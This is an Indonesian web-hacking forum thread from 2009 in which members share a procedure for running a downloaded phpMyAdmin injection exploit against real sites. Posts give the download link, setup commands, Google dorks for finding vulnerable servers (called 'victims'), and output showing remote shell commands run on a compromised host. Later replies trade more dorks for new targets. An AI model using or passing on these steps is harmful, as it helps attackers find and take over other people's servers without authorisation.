phpMyAdmin injection code

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya
User avatar
shad.hckr
Posts: 555
Joined: Mon Sep 29, 2008 4:48 am
Location: /home/sh4dhckr
Contact:

Re: phpMyAdmin injection code

Post by shad.hckr » Sat Jun 20, 2009 9:53 pm

agent_of_change wrote:
Xshadow wrote:
berarti tidak diperbolehkan masuk phpmyadmin secara langsung :)
harus lewat cpanel dulu...
try and error trus bro :)
cari target lain :D
jangan terpaku 1 target :)
ada dork nya ga?
biar cepet dapet korban

Code: Select all

inurl:phpmyadmin
mungkin bisa pake itu kk..

User avatar
justkid
Posts: 19
Joined: Sat Jul 12, 2008 3:05 am

Re: phpMyAdmin injection code

Post by justkid » Sat Jun 20, 2009 9:59 pm

3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
Harus pake Linux ya.....

isntal dulu dung :(

User avatar
Xshadow
Posts: 482
Joined: Thu May 31, 2007 8:01 pm
Location: http://captureflags.com
Contact:

Re: phpMyAdmin injection code

Post by Xshadow » Mon Jun 22, 2009 3:21 am

justkid wrote:
3. kalo kamu pake linux kamu harus install curl caranya :
Code:
sudo apt-get install curl
Harus pake Linux ya.....

isntal dulu dung :(
pakai lve cd juga bisa...
atau pakai Damn small linux yang fersi qemu.... cuman butuh komputer spec yang agak advanced dikit :D
[X]perimental [S]ynthetic [H]umanoid [A]ssembled for [D]estruction and [O]nline [W]arfare

KOPASSUS
Posts: 1
Joined: Mon Apr 20, 2009 12:19 pm

Re: phpMyAdmin injection code

Post by KOPASSUS » Sun Aug 09, 2009 10:11 am

wishnusakti wrote:jumpa lagi nih... jangan bosen ya... disini aku mau kasih PoC phpMyAdmin injection code, dan udah berhasil sih hehehe :D. ok deh langsung aja :

1. Download exploit nya di milw0rm

Code: Select all

http://milw0rm.com/exploits/download/8921
2. setelah di download ubah permission file yang dengan cara :

Code: Select all

chmod 755 nama_file.sh
3. kalo kamu pake linux kamu harus install curl caranya :

Code: Select all

sudo apt-get install curl
4. googling :

Code: Select all

inurl:phpmyadmin
5. contoh nya :

Code: Select all

wishnu@stupid:~/Desktop$ ./myadmin.sh http://**********.****.**/
[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/myadmin.sh.25692.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://*********.*****.**//config/config.inc.php?c=ls+-l+/
    http://***************//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com
dan hasilnya :

Code: Select all

total 112
drwxr-xr-x   2 root root  4096 Mar 11 06:47 bin
drwxr-xr-x   3 root root  4096 Apr 16 07:24 boot
lrwxrwxrwx   1 root root    11 Feb 19 20:07 cdrom -> media/cdrom
drwxr-xr-x  13 root root 13840 May 31 08:21 dev
drwxr-xr-x  96 root root  4096 Jun 11 06:44 etc
drwxr-xr-x   5 root root  4096 May  4 13:49 home
lrwxrwxrwx   1 root root    32 Feb 20 07:00 initrd.img -> boot/initrd.img-2.6.27-11-server
lrwxrwxrwx   1 root root    31 Feb 19 20:09 initrd.img.old -> boot/initrd.img-2.6.27-7-server
drwxr-xr-x  13 root root 12288 Apr 16 07:23 lib
drwx------   2 root root 16384 Feb 19 20:07 lost+found
drwxr-xr-x   3 root root  4096 Feb 19 20:07 media
drwxr-xr-x  14 root root  4096 May 18 22:39 mnt
drwxr-xr-x   2 root root  4096 Feb 19 20:08 opt
dr-xr-xr-x 115 root root     0 May 31 08:21 proc
drwxr-xr-x   9 root root  4096 May 19 14:47 root
drwxr-xr-x   2 root root  4096 Apr 16 07:23 sbin
-rw-------   1 root root 31903 Feb 19 23:34 sql1qPPmS
drwxr-xr-x   2 root root  4096 Feb 19 20:08 srv
drwxr-xr-x  12 root root     0 May 31 08:21 sys
drwxrwxrwt   5 root root  4096 Jun 14 05:32 tmp
drwxr-xr-x  11 root root  4096 Feb 19 20:14 usr
drwxr-xr-x  15 root root  4096 Feb 19 20:26 var
lrwxrwxrwx   1 root root    29 Feb 20 07:00 vmlinuz -> boot/vmlinuz-2.6.27-11-server
lrwxrwxrwx   1 root root    28 Feb 19 20:09 vmlinuz.old -> boot/vmlinuz-2.6.27-7-server
ok dehhh sekian dulu ya :D

thanks to: inc0mp13te, xshadow, mywisdom, cybermutaqin dan lain lain :D
salam PsyChotr0n
Bro.. gw masih agak bingung di no4.

Googling,

Code: Select all

inurl:phpmyadmin
Nah, disini bentuk URL nya seperti apa yg kita cari..?

kira-kira bisa di kasih detail lagi gak..? :D

sorry, gw newbie..

User avatar
gblack
Posts: 61
Joined: Tue Jan 30, 2007 8:12 pm
Location: /r00tb0x
Contact:

Re: phpMyAdmin injection code

Post by gblack » Mon Aug 10, 2009 3:43 pm

Code: Select all

inurl:"querywindow.php"
inurl:"/xampp/phpinfo.php"
inurl:"import.php"
Dork diatas mungkin ga 100% akurat.. Tp selama itu bs memberikan target baru why not... ;)

Down doesn't mean die.

I will never die,
gbLaCk-


zpwnd
Posts: 2
Joined: Wed Oct 07, 2009 1:01 am

Re: phpMyAdmin injection code

Post by zpwnd » Wed Oct 07, 2009 1:12 am

Santet wrote:iya disini terdeksi av nya linux apa geto
tpi kompi saya buat kerja
dan ini bkn kompi sendiri
ada cara laen yang bwt windows gk??
please :(
hueuhe,,,
mank harus pake linux cuz ini koding bash :P

User avatar
r-newbie
Posts: 5
Joined: Thu Jan 10, 2008 4:49 am
Location: SEMARANG
Contact:

Re: phpMyAdmin injection code

Post by r-newbie » Sat Oct 17, 2009 12:57 am

udah tk coba bro..,tp hasilnya seringnya gni..

Code: Select all

[+] could not grab form token. you might want to try exploiting the vuln manually :(
musti rajin2 cari target nih :roll:
Learning Newbie

User avatar
tey
Posts: 68
Joined: Tue May 01, 2007 11:30 am
Location: heaven

Re: phpMyAdmin injection code

Post by tey » Thu Dec 24, 2009 12:57 pm

gblack wrote:

Code: Select all

inurl:"querywindow.php"
inurl:"/xampp/phpinfo.php"
inurl:"import.php"
Dork diatas mungkin ga 100% akurat.. Tp selama itu bs memberikan target baru why not... ;)
hehheh sip tambahin neh atu lg dork na

Code: Select all

inurl:xampp/lang.php?
:kaca:
i am not detractor person..like u :)
be a good boy..

User avatar
the_girl
Posts: 16
Joined: Sun Mar 25, 2007 4:09 am
Location: ©urup±$em@rang™
Contact:

Re: phpMyAdmin injection code

Post by the_girl » Thu Dec 24, 2009 1:07 pm

wedew...
omz @ll...
ikut cuba nyack oms...
mohon bimbingannya...

Code: Select all

inurl:phpmyadmin/index.php
inurl:phpmyadmin/index.php joomla
xixix...mav omz masi nubei...

kocokprotol
Posts: 129
Joined: Thu Jul 23, 2009 12:07 am
Contact:

Re: phpMyAdmin injection code

Post by kocokprotol » Fri Dec 25, 2009 5:06 am

aaaaaaaaaaaaaaaaaaaaaaaaaaa gak ngerti aqo ...............
pening kepala awak ni bacanya ...

Post Reply

Return to “Web Hacking”